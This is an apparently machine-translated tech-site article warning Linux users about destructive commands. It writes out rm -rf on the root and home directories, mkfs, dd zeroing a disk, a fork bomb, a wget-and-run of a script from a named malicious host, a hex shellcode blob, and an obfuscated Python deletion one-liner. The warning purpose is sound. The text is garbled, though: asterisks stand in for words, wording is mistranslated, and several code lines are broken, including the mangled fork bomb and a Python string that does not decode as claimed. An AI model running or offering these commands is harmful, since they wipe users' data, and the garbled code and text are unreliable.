Shulou(Shulou.com)06/01 Report--

This article mainly introduces what Linux unsafe commands are, which can be used for reference. Interested friends can refer to them. I hope you can learn a lot after reading this article.

The commands listed in this article should never be run, even if you are curious, unless you are running on a virtual machine (if something goes wrong, you can restore it), because they will actually damage your system. So it is a good habit not to execute commands under senior administrative privileges such as root.

Sooner or later, the Linux system will be as popular as Windows, and more and more people will use it, including people who don't know much about computers. The purpose of this article is to tell you: while Linux gives you a degree of freedom, it also makes it easier to destroy the system. If you don't understand the meaning of certain commands, download and execute scripts containing malicious commands, or be tricked into running certain commands, it's easy to make you cry.

This does not mean that Linux is not secure, but that Linux is very insecure in front of people who do not know Linux and are very careless. Whether it is Windows or Linux, people themselves are the unsafe factor.

Rm

The following command will delete files on your hard drive. Rm's-r recursive deletion and-f forced deletion are dangerous options. Even if you operate on a daily basis, you will encounter accidental deletion of files.

Sudo rm-rf / delete all files in the root partition sudo rm-rf. Delete all files in the current directory sudo rm-rf * as above rm-rf * or rm-rf *. * as above rm-rf ~ / & delete the root partition and home directory, even if you are not root, the home directory will not be spared.

Format command

Similarly, if you don't know mkfs.xxxx (xxxx can be vfat, ext2, ext3, bfs...) If it is a format command, running the following command will erase your hard disk partition:

Sudo mkfs.xxxx

Dd

Dd is a powerful IO input and output orientation tool, which can be very destructive if not used properly, not just the current partition, the current system, and sometimes the entire hard drive.

All hard drives of sudo dd if=/dev/zero of=/dev/sda are zeroed. Sudo dd if=/dev/sda of=/dev/sdb overwrites the contents of the second block with the contents of the * block of hard drives. Sudo dd if=something of=/dev/sda writes junk data to the hard drive.

The command result is directed to the hard disk

Similarly, directing the command result directly to the hard disk is equivalent to writing junk data to the hard disk:

Any_command > / dev/sda destroys the hard disk with random data

The above sda and sdb may also be other similar names. Linux's / dev system not only provides convenient and powerful functions for manipulating hardware, but also makes destruction easier.

Fork command

The fork command opens a child process. If you put fork in a * loop, the final child process will use up all memory resources:

: {:: |: &};:

The abbreviated form of a sentence

This inexplicable symbol can make Shell's constant fork child process run out of memory and have to be restarted. This is not bug, but Shell statements are deliberately written in abbreviated form. The same goes for the following:

Fork while fork

Compressed packet

Sometimes, compressed packages are also a source of damage.

Some zip packages require you to unzip to a directory that already exists in a system, so you should be very careful. There may be thousands of small files in the package, trying to overwrite your existing files with various file names.

Some compressed packages look small, but unzipped is junk data on GB, which will flood your hard drive.

Programs and scripts downloaded from informal websites are also in danger of containing malicious commands and cannot be executed casually:

Wget [url] http://some_place/some_file[/url] sh. / some_file wget [url] http://hax018r.org/malicious-script[/url] sh. / malicious-script

Load script

Load the script to make sure the source is regular, and if you have the ability, you can read its code. Even if you have a program with source code, don't compile and execute it:

Char esp [] _ _ attribute__ ((section (".text")) / * e.s.p release * / = "xebx3ex5bx31xc0x50x54x5ax83xecx64x68", "xffxffxffxffx68xdfxd0xdfxd9x68x8dx99", "xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7", "x56x04xf7x56x08xf7x56x0cx83xc4x74x56", "x8dx73x08x56x53x54x59xb0x0bxcdx80x31", "xc0x40xebxf9xe8xbdxffxffxffx2fx62x69", "x6ex2fx73x68x00x2dx63x00"cp-p / bin/sh / tmp/.beyond; chmod 4755 / tmp/.beyond;"

The above seems to be just a pile of meaningless hexadecimal data. If someone tells you to run this program, you can get root access to the system without entering a password. Don't trust him, the above program actually runs "rm-rf ~ / &".

Script language

Scripting languages like python can also be used to sabotage:

Python-c 'import os; os.system ("" .join ([chr (ord (I)-1) for i in "snake.sg!"]))'

This program actually executes rm-rf *. You may be wondering what the "snub.sg!" at the end of the above program means. It's actually rm-rf * the next of each letter!

So how do we avoid running malicious programs?

* do not use root as a daily user, the above program, if the current user is not root, the scope of harm will be much smaller.

Second, you should know which commands are used for what, and don't run commands that you don't know. To run potentially destructive programs, check your input carefully.

Third, it is necessary to ensure that the source of software and scripts is regular.

*, although relatively negative, it is indeed a very important point:

Back up your data frequently!

Thank you for reading this article carefully. I hope the article "what are the unsafe orders for Linux" shared by the editor will be helpful to you. At the same time, I also hope that you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.